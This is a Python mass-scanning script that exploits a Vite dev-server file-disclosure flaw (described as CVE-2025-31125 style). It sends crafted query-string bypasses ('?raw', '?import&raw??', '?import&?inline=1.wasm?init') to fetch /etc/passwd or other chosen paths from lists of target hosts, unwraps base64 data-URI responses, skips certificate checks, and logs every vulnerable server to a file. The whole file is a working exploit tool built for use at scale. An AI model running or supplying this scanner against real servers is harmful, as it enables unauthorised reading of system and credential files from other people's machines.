"""Batch scanner for Vite dev-server file disclosure (CVE-2025-31125 style).

For every base URL and every target path, three query-string variants are
requested; a response containing ``root:`` is reported as a hit and appended
to the output file.
"""

import argparse
import base64
import binascii
import concurrent.futures
import re
import threading
import time
from urllib.parse import urljoin

import requests
import urllib3
from colorama import Fore, Style, init

# Initialise colorama so coloured output also works on Windows consoles.
init(autoreset=True)

# Suppress SSL warnings: every request below is sent with verify=False.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Maximum number of retries after a connection-level failure.
RETRY_LIMIT = 3

# File that successful URLs are appended to when the caller does not pick one.
DEFAULT_OUTPUT_FILE = "output.txt"

# Global lock serialising console output (and result-file appends) across
# worker threads.
print_lock = threading.Lock()

# Verbose-mode regex for a base64 ``data:text/plain`` URI.
#   group 1: optional opening quote (single, double or none)
#   group 2: the base64 payload (groups of 4 chars, optional 1- or 2-char
#            padding tail)
#   \1     : the matching closing quote, if one was opened
# The line breaks inside the literal matter: under re.VERBOSE each inline
# ``#`` comment runs to the end of its line.
CVE_2025_31125_base_pattern = r'''
    data:text/plain;base64,     # 固定前缀
    (["']?)                     # 可选引号(支持单/双引号或无引号)
    (
        (?:[A-Za-z0-9+/]{4})*   # 标准分组(每4字符)
        (?:[A-Za-z0-9+/]{3}=    # 允许1个填充符
        | [A-Za-z0-9+/]{2}==)?  # 允许2个填充符
    )
    \1                          # 闭合引号(若存在)
'''

# Compiled once so worker threads do not re-resolve the pattern per response.
_DATA_URI_RE = re.compile(CVE_2025_31125_base_pattern, re.VERBOSE)

# URL errors that can never succeed on retry (e.g. a blank or scheme-less URL).
_NON_RETRYABLE_ERRORS = (
    requests.exceptions.MissingSchema,
    requests.exceptions.InvalidSchema,
    requests.exceptions.InvalidURL,
)


def sanitize_filename(url):
    """Turn a URL into a string that is safe to use as a file name."""
    safe_name = re.sub(r'[^\w\-]', '_', url)   # replace illegal characters
    safe_name = re.sub(r'_+', '_', safe_name)  # collapse runs of `_`
    safe_name = safe_name.strip('_')           # drop leading/trailing `_`
    return safe_name


def fetch_url(url, proxy, retries=0):
    """GET ``url`` and return the response body, retrying on connection errors.

    Args:
        url: Absolute URL to request.
        proxy: Proxy URL used for both http and https, or a falsy value for a
            direct connection.
        retries: Number of retries already consumed; callers normally leave
            this at 0.

    Returns:
        The response text when the status code is exactly 200, otherwise
        ``None`` (non-200 status, malformed URL, or retries exhausted).
    """
    proxies = {"http": proxy, "https": proxy} if proxy else None
    attempt = retries
    while True:
        try:
            response = requests.get(
                url,
                timeout=5,
                verify=False,
                proxies=proxies,
                allow_redirects=False,
            )
        except _NON_RETRYABLE_ERRORS:
            # A malformed URL fails identically every time; skip the backoff.
            with print_lock:
                print(f"[ERROR] {url} Connection error")
            return None
        except requests.exceptions.RequestException:
            if attempt >= RETRY_LIMIT:
                with print_lock:
                    print(f"[ERROR] {url} Connection error")
                return None
            time.sleep(2 ** attempt)  # exponential backoff: 1s, 2s, 4s, ...
            attempt += 1
            continue

        if response.status_code == 200:
            return response.text
        with print_lock:
            print(f"[FAIL] {url}")
        return None


def _decode_data_uri(text):
    """Return the decoded payload of the first base64 data URI in ``text``.

    Returns ``None`` when ``text`` holds no data URI or the payload cannot be
    decoded, so the caller can fall back to the raw response body.
    """
    match = _DATA_URI_RE.search(text)
    if match is None:
        return None
    try:
        raw = base64.b64decode(match.group(2))
    except (binascii.Error, ValueError):
        return None
    # The leaked file may not be valid UTF-8; never let that kill the worker.
    return raw.decode("utf-8", errors="replace")


def _report_success(url, output_file):
    """Print a SUCCESS line for ``url`` and append it to ``output_file``."""
    # The lock also covers the append so concurrent hits do not interleave.
    with print_lock:
        print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}")
        with open(output_file, "a", encoding="utf-8") as f:
            f.write(f"[SUCCESS] {url}\n")


def check_path(base_url, path, proxy, output_file):
    """Probe one path on one base URL with the three query-string variants.

    Args:
        base_url: Base URL of the target server.
        path: File path joined onto ``base_url`` with ``urljoin``.
        proxy: Proxy URL or a falsy value.
        output_file: File that a successful URL is appended to.

    Returns:
        The first variant URL whose body contains ``root:``, or ``None``.
    """
    target = urljoin(base_url, path)
    url1 = target + "?raw"
    url2 = target + "?import&raw??"
    url3 = target + "?import&?inline=1.wasm?init"
    candidates = (url1, url2, url3)

    # One worker per variant so all three requests really run concurrently.
    with concurrent.futures.ThreadPoolExecutor(max_workers=len(candidates)) as inner_executor:
        futures = [inner_executor.submit(fetch_url, url, proxy) for url in candidates]
        content1, content2, content3 = [future.result() for future in futures]

    # The third variant returns the file wrapped in a base64 data URI; unwrap
    # it. fetch_url returns None on failure, so guard before searching.
    if content3:
        decoded = _decode_data_uri(content3)
        if decoded is not None:
            content3 = decoded

    for url, content in zip(candidates, (content1, content2, content3)):
        if content and "root:" in content:
            _report_success(url, output_file)
            return url

    with print_lock:
        for url in candidates:
            print(f"[FAIL] {url}")
    return None


def check_url(base_url, paths, proxy, output_file):
    """Run ``check_path`` concurrently for every path on one base URL.

    Returns:
        List of the successful URLs (possibly empty).
    """
    results = []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        future_to_path = {
            executor.submit(check_path, base_url, path, proxy, output_file): path
            for path in paths
        }
        for future in concurrent.futures.as_completed(future_to_path):
            res = future.result()
            if res:
                results.append(res)
    return results


def check_urls_from_file(file_path, paths, proxy):
    """Check every base URL listed (one per line) in ``file_path``.

    Blank lines are skipped. Hits are appended to ``output.txt`` by the
    worker threads.

    Returns:
        List of all successful URLs across every base URL.
    """
    with open(file_path, 'r', encoding="utf-8") as file:
        links = [line.strip() for line in file if line.strip()]

    with print_lock:
        print(f"[INFO] Processing {len(links)} base URLs concurrently.")

    output_file = DEFAULT_OUTPUT_FILE
    results = []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        future_to_link = {
            executor.submit(check_url, link, paths, proxy, output_file): link
            for link in links
        }
        for future in concurrent.futures.as_completed(future_to_link):
            res = future.result()
            if res:
                results.extend(res)
    return results


def check_urls_from_dict(paths, proxy):
    """Fetch every entry of ``paths`` directly as a complete URL.

    Used when only a dictionary file is supplied: each entry is requested
    as-is and reported as a hit when the body contains ``root:``. Empty
    entries are skipped.

    Returns:
        List of the entries that produced a hit.
    """
    output_file = DEFAULT_OUTPUT_FILE
    results = []
    with open(output_file, "a", encoding="utf-8") as f:
        with concurrent.futures.ThreadPoolExecutor() as executor:
            future_to_path = {
                executor.submit(fetch_url, path, proxy): path
                for path in paths
                if path
            }
            for future in concurrent.futures.as_completed(future_to_path):
                path = future_to_path[future]
                content = future.result()
                if content and "root:" in content:
                    with print_lock:
                        print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}")
                    f.write(f"[SUCCESS] {path}\n")
                    results.append(path)
                else:
                    with print_lock:
                        print(f"[FAIL] {path}")
    return results


def main():
    """Parse the command line and dispatch to the matching scan mode."""
    parser = argparse.ArgumentParser(description="Batch check access to multiple paths on multiple links")
    parser.add_argument("-f", "--file", help="File containing base links")
    parser.add_argument("-u", "--url", help="Target URL")
    parser.add_argument("-p", "--payload", default='/etc/passwd', help="Target file path")
    parser.add_argument("-d", "--dict", help="File containing list of paths to append to base URL")
    parser.add_argument("--proxy", help="Proxy server (e.g., http://proxy:port)")

    args = parser.parse_args()

    paths = []
    if args.dict:
        with open(args.dict, 'r', encoding="utf-8") as dict_file:
            paths = [line.strip() for line in dict_file if line.strip()]
    elif args.payload:
        paths.append(args.payload)

    if args.url:
        check_url(args.url, paths, args.proxy, DEFAULT_OUTPUT_FILE)
    elif args.file:
        check_urls_from_file(args.file, paths, args.proxy)
    elif args.dict:
        # No base URL given: dictionary entries are treated as full URLs.
        check_urls_from_dict(paths, args.proxy)
    else:
        print("Usage: python3 script.py -h")


if __name__ == "__main__":
    main()